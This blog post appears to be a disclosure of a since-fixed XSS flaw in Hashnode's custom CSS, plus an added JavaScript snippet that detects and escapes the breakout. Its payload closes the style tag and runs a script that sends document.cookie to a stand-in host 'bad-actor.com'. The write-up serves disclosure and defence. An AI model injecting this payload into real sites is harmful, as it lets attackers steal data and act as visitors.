Note: this has been fixed now.
Kudos to the Hashnode team for fixing this so fast.
Yes, you read that right. I exploited an XSS vulnerability in Hashnode's Custom CSS to add a script tag that can run any malicious JavaScript. This has been fixed now, so you don't have to worry about anything anymore.
How?
The custom CSS feature on Hashnode allows us to style the site with CSS, which seems to be directly inserted in the head. I just added a script tag at the end of my CSS...
/* ... styles ... */
</style>
<script>
alert(document.cookie)
/* get your cookies, possibly giving access to your account */
fetch('bad-actor.com/?cookie=' + document.cookie);
</script>
What this does is close the <style> tag and insert a new <script> tag, which can do anything it wants. This means the inserted JavaScript will run whenever a user visits a Hashnode-powered blog with this Custom CSS applied.
Impact
We can't extract any user data or JWTs, since they are stored as HttpOnly cookies that client-side JavaScript can't read, so this trick can't steal them. But you can still do anything on behalf of the logged-in user as long as the JWT is valid, say, post a random comment. You could probably also extract refresh tokens, but I didn't go too deep into that.
What we can do is exploit your trust in Hashnode and, say, redirect you to malicious sites which you may trust because you arrived from a Hashnode site.
You could also do other annoying stuff like send notifications, eat your RAM and crash your system, or redirect you to the annoying site (warning: that site is super annoying!).
I didn't add any malicious code in there, luckily for you. It has been fixed by converting all <, > and other symbols to their &xxx; variants.
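The breakout above works because a <style> element is raw text to the HTML parser: it ends at the first "</style" it sees, ignores CSS syntax, and does not decode character references (so an &gt; written into a style block would stay literally in the CSS and break a selector like `.post > h1`). The following added example, not Hashnode's code, shows one way to detect the payload shape described in this post and to neutralise it by rewriting only `<` as the CSS escape `\3c `, leaving `>` and the rest of the CSS intact; the payload and sample CSS are constructed.

```javascript
// Added example (not Hashnode's code): detecting and neutralising the
// "</style><script>" breakout before embedding untrusted custom CSS.
//
// <style> content is raw text: the HTML tokenizer ends the element at the
// first "</style", regardless of CSS syntax, and never decodes entities.
// Hence the only character that can end the element is '<'. Every '<' is
// rewritten as the CSS escape "\3c " (hex code point plus a terminating
// space), which the CSS parser reads back as '<' inside strings and
// identifiers, while '>' (needed for child combinators) is left alone.

const STYLE_BREAKOUT = /<\/style/i; // conservative match for the tokenizer's trigger

// Detection: flag custom CSS that attempts to close the enclosing <style>.
function containsStyleBreakout(css) {
  return STYLE_BREAKOUT.test(css);
}

// Mitigation: neutralise '<' without touching any other CSS syntax.
function escapeCssForStyleElement(css) {
  return css.replace(/</g, "\\3c ");
}

// Build the <style> element exactly as it would be inserted into <head>.
function buildStyleTag(css) {
  return `<style>${escapeCssForStyleElement(css)}</style>`;
}

// Count the "</style" closers the HTML parser would see in a fragment;
// a safely built style tag contains exactly one (its own).
function countStyleClosers(html) {
  return (html.match(/<\/style/gi) || []).length;
}

// Constructed sample input shaped like the payload described in the post.
const PAYLOAD =
  "body { color: red }\n</style>\n<script>\nalert(document.cookie)\n</script>";

// Constructed legitimate CSS that entity-encoding '>' would have broken.
const LEGIT_CSS = '.post > h1 { color: red }\n.q::before { content: "<" }';

console.log(containsStyleBreakout(PAYLOAD));            // true
console.log(containsStyleBreakout(LEGIT_CSS));          // false
console.log(countStyleClosers(buildStyleTag(PAYLOAD))); // 1
console.log(escapeCssForStyleElement(LEGIT_CSS));       // child combinator kept
```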
Key takeaway: Sanitize your database inputs.